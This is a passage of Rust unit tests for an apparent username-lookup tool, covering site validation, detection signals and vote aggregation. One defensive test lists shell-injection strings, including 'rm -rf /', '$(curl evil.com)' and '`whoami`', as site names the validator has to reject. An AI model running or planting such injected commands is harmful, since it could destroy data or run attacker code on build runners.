    fn site_with(signals: Vec<Signal>) -> Site {
        Site {
            name: "Example".into(),
            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
            signals,
            known_present: None,
            known_absent: None,
            extract: Vec::new(),
            tags: Vec::new(),
            request_headers: std::collections::BTreeMap::new(),
            regex_check: None,
            engine: None,
            strip_bad_char: None,
            request_method: crate::site::HttpMethod::Get,
            request_body: None,
            protection: Vec::new(),
            disabled: false,
            disabled_reason: None,
            source: None,
            popularity: None,
            access: crate::AccessPolicy::default(),
        }
    }

    #[test]
    fn url_template_substitutes_placeholder() {
        let user = Username::new("alice").unwrap();
        let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        assert_eq!(site.url_for(&user), "https://example.com/alice");
    }

    #[test]
    fn url_for_strips_bad_chars_before_substitution() {
        let user = Username::new("john.doe").unwrap();
        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        site.strip_bad_char = Some(".".into());
        assert_eq!(site.url_for(&user), "https://example.com/johndoe");
    }

    #[test]
    fn url_for_strip_bad_char_noop_when_no_match() {
        let user = Username::new("alice").unwrap();
        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        site.strip_bad_char = Some(".".into());
        assert_eq!(site.url_for(&user), "https://example.com/alice");
    }

    #[test]
    fn canonical_username_matches_url_stripping() {
        let user = Username::new("john.doe").unwrap();
        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        site.strip_bad_char = Some(".".into());
        assert_eq!(site.canonical_username(&user), "johndoe");
    }

    #[test]
    fn url_template_rejects_missing_placeholder() {
        assert!(UrlTemplate::new("https://example.com/users/").is_err());
    }

    #[test]
    fn url_template_rejects_bad_scheme() {
        assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
    }

    #[test]
    fn validate_requires_non_empty_signals() {
        let err = site_with(vec![]).validate().unwrap_err();
        assert!(err.to_string().contains("signals list is empty"));
    }

    #[test]
    fn validate_rejects_empty_status_codes() {
        let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
            .validate()
            .unwrap_err();
        assert!(err.to_string().contains("status signal"));
    }

    #[test]
    fn validate_rejects_empty_body_text() {
        let err = site_with(vec![Signal::BodyAbsent {
            text: String::new(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("body signal"));
    }

    #[test]
    fn validate_rejects_bad_body_username_marker() {
        // An empty marker is rejected outright.
        let err = site_with(vec![Signal::BodyUsername {
            text: String::new(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("body username signal"));

        // A non-empty marker must still contain the `{username}` placeholder.
        let err = site_with(vec![Signal::BodyUsername {
            text: "username".into(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("missing {username} placeholder"));
    }

    #[test]
    fn validate_rejects_empty_redirect_fragment() {
        let err = site_with(vec![Signal::RedirectAbsent {
            fragment: String::new(),
        }])
        .validate()
        .unwrap_err();
        assert!(err.to_string().contains("redirect signal"));
    }

    #[test]
    fn validate_rejects_shell_metacharacters_in_name() {
        // The validate-sites.yml workflow used to inject `--only "$name"`
        // where `$name` came from PR-controlled sites.json. A name like
        // `Foo"; rm -rf /; #` would have broken out of `"..."` quoting
        // and executed on the runner. Schema + this loader both enforce
        // a safe character class; verify a representative selection of
        // dangerous chars is rejected.
        for bad in [
            "Foo\"; rm -rf /; #",
            "Bar$(curl evil.com)",
            "Baz`whoami`",
            "Qux\\nfoo",
            "back\\slash",
            "pipe|ish",
            "semi;colon",
            "amp&and",
            "lt<gt>",
        ] {
            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
            s.name = bad.into();
            let err = s.validate().unwrap_err();
            assert!(
                err.to_string()
                    .contains("characters outside the allowed set"),
                "expected unsafe-name rejection for {bad:?}, got {err}",
            );
        }
    }

    #[test]
    fn validate_accepts_real_world_site_names() {
        // Cross-check the validation against names we actually ship.
        for ok in [
            "GitHub",
            "Steam Community (User)",
            "X / Twitter",
            "osu!",
            "Eintracht Frankfurt Forum",
            "Archive of Our Own",
            "Career.habr",
            "fl",
            "GitLab.com",
            "Sbazar.cz",
        ] {
            let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
            s.name = ok.into();
            assert!(s.validate().is_ok(), "expected {ok:?} to validate");
        }
    }

    #[test]
    fn validate_rejects_overlong_name() {
        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        s.name = "A".repeat(100);
        let err = s.validate().unwrap_err();
        assert!(err.to_string().contains("longer than"));
    }

    #[test]
    fn validate_accepts_well_formed_regex_check() {
        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
        assert!(s.validate().is_ok());
    }

    #[test]
    fn validate_tolerates_unsupported_regex_features() {
        // Sherlock-imported regexes occasionally use lookarounds
        // (e.g. `(?!...)`) that Rust's `regex` crate can't compile —
        // those sites should still load, with the username-gate
        // silently disabled rather than rejecting the whole site.
        let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
        s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
        assert!(
            s.validate().is_ok(),
            "lookaround-bearing regex should warn, not reject the site"
        );
    }

    #[test]
    fn signal_status_found_votes_only_on_match() {
        let signal = Signal::StatusFound { codes: vec![200] };
        let probe = Probe {
            status: 200,
            final_url: "https://example.com/alice",
            body: "",
            username: "alice",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
        let probe = Probe {
            status: 404,
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_status_not_found_votes_only_on_match() {
        let signal = Signal::StatusNotFound { codes: vec![404] };
        let probe = Probe {
            status: 404,
            final_url: "",
            body: "",
            username: "alice",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            status: 200,
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_body_absent_votes_not_found_when_text_present() {
        let signal = Signal::BodyAbsent {
            text: "Profile not found".into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "",
            body: "<h1>Profile not found</h1>",
            username: "alice",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            body: "<h1>Welcome alice</h1>",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn signal_body_username_votes_found_only_for_rendered_username() {
        let signal = Signal::BodyUsername {
            text: r#""username":"{username}""#.into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "",
            body: r#"{"username":"johndoe"}"#,
            username: "johndoe",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);

        // Same body, different probed username: the rendered marker no
        // longer appears, so the signal abstains.
        let probe = Probe {
            username: "john.doe",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn generic_body_present_does_not_confirm_username() {
        assert!(
            !Signal::BodyPresent {
                text: "username".into()
            }
            .confirms_username()
        );
        assert!(
            Signal::BodyUsername {
                text: "{username}".into()
            }
            .confirms_username()
        );
    }

    #[test]
    fn signal_redirect_absent_inspects_final_url() {
        let signal = Signal::RedirectAbsent {
            fragment: "/login".into(),
        };
        let probe = Probe {
            status: 200,
            final_url: "https://example.com/login?next=/alice",
            body: "",
            username: "alice",
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
        let probe = Probe {
            final_url: "https://example.com/alice",
            ..probe
        };
        assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
    }

    #[test]
    fn describe_match_names_the_evidence_and_rule() {
        let probe = Probe {
            status: 404,
            final_url: "https://example.com/login",
            body: "@alice",
            username: "alice",
        };
        assert_eq!(
            Signal::StatusNotFound { codes: vec![404] }.describe_match(&probe),
            "HTTP 404 (status_not_found)"
        );
        // The body-username description shows the rendered marker, not the
        // raw `{username}` template.
        assert_eq!(
            Signal::BodyUsername {
                text: "@{username}".into()
            }
            .describe_match(&probe),
            "body contains \"@alice\" (body_username)"
        );
        assert_eq!(
            Signal::RedirectAbsent {
                fragment: "/login".into()
            }
            .describe_match(&probe),
            "final URL contains \"/login\" (redirect_absent)"
        );
    }

    #[test]
    fn aggregate_found_when_only_found_signals_fire() {
        let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::Found);
    }

    #[test]
    fn aggregate_not_found_when_only_not_found_signals_fire() {
        let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::NotFound);
    }

    #[test]
    fn aggregate_not_found_wins_over_found() {
        // Negative-priority: a NotFound vote outranks a Found vote.
        let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
        assert_eq!(kind, MatchKind::NotFound);
    }

    #[test]
    fn aggregate_uncertain_when_no_signals_fire() {
        let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
        assert_eq!(kind, MatchKind::Uncertain);
    }

    #[test]
    fn aggregate_empty_is_uncertain() {
        let kind = aggregate(std::iter::empty());
        assert_eq!(kind, MatchKind::Uncertain);
    }

    #[test]
    fn needs_body_is_true_only_for_body_signals() {
        assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
        assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
        assert!(
            !Signal::RedirectAbsent {
                fragment: "/login".into()
            }
            .needs_body()
        );
        assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
        assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
        // `BodyUsername` searches the body too, so it must also request it.
        assert!(
            Signal::BodyUsername {
                text: "{username}".into()
            }
            .needs_body()
        );
    }

    #[test]
    fn deserializes_signal_list() {
        let json = r#"{
            "name": "GitHub",
            "url": "https://github.com/{username}",
            "signals": [
                { "kind": "status_found", "codes": [200] },
                { "kind": "status_not_found", "codes": [404] }
            ]
        }"#;
        let site: Site = serde_json::from_str(json).unwrap();
        assert_eq!(site.name, "GitHub");
        assert_eq!(site.signals.len(), 2);
        site.validate().unwrap();
    }

    proptest::proptest! {
        /// For any mix of per-signal verdicts, aggregation obeys the
        /// negative-priority spec: any NotFound wins; else any Found; else
        /// Uncertain.
        #[test]
        fn aggregate_matches_negative_priority_spec(
            votes in proptest::collection::vec(
                proptest::prop_oneof![
                    proptest::strategy::Just(SignalVerdict::Found),
                    proptest::strategy::Just(SignalVerdict::NotFound),
                    proptest::strategy::Just(SignalVerdict::Ambiguous),
                ],
                0..16,
            ),
        ) {
            let kind = aggregate(votes.iter().copied());
            let expected = if votes.contains(&SignalVerdict::NotFound) {
                MatchKind::NotFound
            } else if votes.contains(&SignalVerdict::Found) {
                MatchKind::Found
            } else {
                MatchKind::Uncertain
            };
            proptest::prop_assert_eq!(kind, expected);
        }
    }
}